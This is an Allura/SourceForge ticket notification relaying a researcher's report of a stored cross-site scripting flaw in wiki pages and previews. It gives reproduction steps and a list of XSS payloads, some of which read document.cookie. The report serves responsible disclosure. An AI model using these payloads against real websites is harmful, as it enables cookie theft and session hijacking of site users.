- **status**: closed --> code-review - **private**: Yes --> No
--- ** [tickets:#7528] XSS on wiki page and preview** **Status:** code-review **Milestone:** forge-jul-11 **Labels:** security p1 **Created:** Thu Jul 03, 2014 12:31 PM UTC by Chris Tsai **Last Updated:** Mon Jul 07, 2014 08:29 PM UTC **Owner:** Dave Brondsema Confirmed and reproduced here: https://sourceforge.net/p/strawhat/private-wiki/Swapnil_XSS/ ***This also affects live wiki pages, not just the previews*** Original message from user, Swapnil Thaware: >Respected Authorities, >My name is Swapnil A. Thaware and I am a Security Researcher from India. I >have found security vulnerability in sourceforge.net. Here I am giving the >details of the vulnerability found in sourceforge.net. >Vulnerability : Stored XSS >Vulnerability Description : Cross-Site Scripting (XSS) attacks are a type of >injection, in which malicious scripts are injected into otherwise benign and >trusted web sites. XSS attacks occur when an attacker uses a web application >to send malicious code, generally in the form of a browser side script, to a >different end user. Flaws that allow these attacks to succeed are quite >widespread and occur anywhere a web application uses input from a user within >the output it generates without validating or encoding it. >An attacker can use XSS to send a malicious script to an unsuspecting user. >The end user’s browser has no way to know that the script should not be >trusted, and will execute the script. Because it thinks the script came from a >trusted source, the malicious script can access any cookies, session tokens, >or other sensitive information retained by the browser and used with that >site. These scripts can even rewrite the content of the HTML page. >Step to Reproduce : 1) Login to Account 2) Goto wiki Section then Click on Create Page 3) Write a name 4) and then put XSS Payload in Content box then click on Preview button. 5) Boooommmm !! we get the popup >XSS Payload : ~~~~ <body onLoad=confirm(0)> "><svg/onload=alert(document.cookie)> ">"<img src=x onerror=prompt(document.domain)>"> "><ScRiPt>alert("Hami Hax")<%2FScRiPt> "><img src=x onerror=prompt('Xss');> “><img src=x onerror=alert(document.cookie)> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ~~~~ >POC : I added a screenshot in attachment, please kindly check the attachment. >Kindly let me know when the vulnerability is fixed and I am eligible for any >acknowledgement or any reward. --- Sent from sourceforge.net because [email protected] is subscribed to https://sourceforge.net/p/allura/tickets/ To unsubscribe from further messages, a project admin can change settings at https://sourceforge.net/p/allura/admin/tickets/options. Or, if this is a mailing list, you can unsubscribe from the mailing list.
